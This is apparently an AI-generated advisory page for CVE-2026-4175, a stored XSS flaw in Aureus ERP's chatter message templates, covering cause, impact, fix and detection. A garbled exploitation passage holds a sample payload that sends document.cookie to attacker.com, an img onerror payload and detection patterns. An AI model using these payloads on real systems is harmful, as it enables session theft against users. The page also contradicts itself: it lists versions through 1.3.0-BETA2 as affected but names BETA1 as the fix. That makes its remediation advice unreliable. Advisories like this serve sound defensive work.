
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-4175 is a stored Cross-Site Scripting (XSS) vulnerability in Aureus ERP affecting versions up to and including 1.3.0-BETA2. The flaw resides in the Chatter Message Handler component, specifically in the file plugins/webkul/chatter/resources/views/filament/infolists/components/messages/content-text-entry.blade.php, where the subject and body arguments are rendered without sanitization. It was disclosed on March 16, 2026, and carries a CVSS v3.1 base score of 3.5 (Low) and a CVSS v4.0 base score of 5.1 (Medium) (Feedly, ENISA EUVD).
The root cause is improper neutralization of user-supplied input during web page generation (CWE-79), with an additional classification of CWE-94 (Improper Control of Code Generation). The vulnerable Blade templates used Laravel's unescaped output directive {!! ... !!} to render user-controlled subject and body fields from chatter messages directly into HTML without sanitization, allowing injection of arbitrary JavaScript. The fix, applied in commit 2135ee7efff4090e70050b63015ab5e268760ec8, replaced raw output with str(...)->sanitizeHtml() across nine affected template files including chatter messages, mail templates, blog posts, and website pages. Exploitation requires the attacker to be authenticated (low privileges) and a victim user to view the malicious message (GitHub PR #939, GitHub Commit).
Successful exploitation allows an authenticated attacker to inject and execute arbitrary JavaScript in the browsers of other users who view the crafted chatter message. The primary impact is on integrity (low), with no direct confidentiality or availability impact per the CVSS scoring. In practice, XSS payloads could be used to steal session cookies, perform actions on behalf of victims, redirect users to phishing pages, or escalate privileges within the ERP application if higher-privileged users view the malicious content (Feedly).
No public exploit code or active in-the-wild exploitation has been reported for this vulnerability. The EPSS score is approximately 0.034%, indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires a low-privileged authenticated account and passive user interaction (a victim must view the malicious message), limiting its practical attack surface (Feedly, ENISA EUVD).
subject or body field of the chatter message, insert a JavaScript payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an image-based payload like <img src=x onerror=alert(document.cookie)>.<script>, onerror=, javascript:) in request bodies.subject or body fields contain raw HTML script tags or event handler attributes.The vulnerability is fixed in Aureus ERP version 1.3.0-BETA1 (and later), via commit 2135ee7efff4090e70050b63015ab5e268760ec8 merged on January 12, 2026. Users should upgrade to v1.3.0-BETA1 or any later release immediately. The fix applies Laravel's sanitizeHtml() method to all affected template output points across chatter, mail, blog, and website components. No configuration-based workaround is available; upgrading is the only remediation (GitHub Release v1.3.0-BETA1, GitHub Commit).
The vulnerability received routine automated coverage from vulnerability tracking services including VulDB, ENISA EUVD, and CVE.org upon disclosure in March 2026. A brief mention appeared on Bluesky via the CVE tracking account. No notable security researcher commentary, vendor statements beyond the patch, or significant media coverage has been identified for this low-to-medium severity issue (VulDB, ENISA EUVD).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."